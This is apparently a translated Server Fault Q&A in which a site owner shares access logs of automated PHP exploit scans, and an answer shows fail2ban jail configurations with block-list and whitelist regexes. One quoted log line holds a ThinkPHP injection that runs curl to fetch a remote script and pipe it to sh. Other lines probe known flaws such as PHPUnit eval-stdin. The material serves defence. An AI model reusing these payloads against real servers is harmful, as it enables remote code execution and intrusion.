網路伺服器被攻擊

我的網路伺服器不斷受到嘗試使用 PHP 漏洞和使用 GET 請求的攻擊。我應該有多擔心我是否已被入侵，以及如何檢查一些請求返回 302 和一些返回 200。如果我被入侵，保持目前伺服器配置和刪除不需要的腳本的最佳方法是什麼。我提供的範例是在最後一天內提供的，這只是讓您了解問題有多嚴重的幾個範例。我應該如何應對這種情況？我也安裝了fail2ban。我可以提供您需要的任何其他範例/數據來幫助我解決此問題！非常感謝您！

一些訪問日誌資訊：

範例 1：

    - - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 - - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 - - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 - - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

範例 2：

- - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1"
This line being spammed over 200 times

範例 3：

- - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041 

我安裝了fail2ban

安裝 fail2ban 是不夠的，您必須對其進行配置以滿足您的需求。Fail2ban 只是一個工具，需要像許多其他工具一樣正確使用。

要阻止這樣的“洪水”，您基本上有 3 種主要可能性：

1. 如果您確定您的網頁基本上沒有一些損壞的連結，則足以對 404（或其他一些 40x）響應做出反應：

[bad-http]
logpath = /path/to/your/log
filter =
# fail on every 40x (excepting 401 for authentication attempt, which should be handled separately):
failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

並且您必須檢查（並且可能更正）導致 302 重定向的規則（可能是此重定向只會影響的 URI 白名單）。

2. 如果您不能確定或需要更精確的處理，您必須創建一些此機器人經常使用的阻止列表 URI（或檢查引薦來源網址或某些 cookie 或其他任何內容），例如：

[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (uris starting with this block-list):
_blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

請注意，在這種情況下，您必須檢查阻止列表中的 URI 前綴是否與您的合法 URI 衝突，並持續維護此列表。另請注意，“入侵者”避免您的禁令非常簡單，只需更改 URI（例如通過在您的前綴之前添加一些其他參數）

3. 與 2 相同，但使用有效 URI 的白名單：

[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (excepting given white-list):
_whitelist = my-app|other-app
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

在這裡，您可以指定所有有效的前綴 RE，_whitelist以避免可能的合法 URI 誤報。

不管你用什麼，你可以從大maxretry（和短findtime）和小的值開始bantime（這樣可以避免可能的誤報太長的禁令），如果你的fail2ban版本> = 0.10並啟用bantime.increment，那麼累犯的惡棍會被禁止更長時間以後更快。

還可以考慮https://github.com/fail2ban/fail2ban/wiki/Best-practice以獲得一些建議，以獲取如何更有效地配置 fail2ban 監獄和過濾器的建議。

引用自：https://serverfault.com/questions/1056779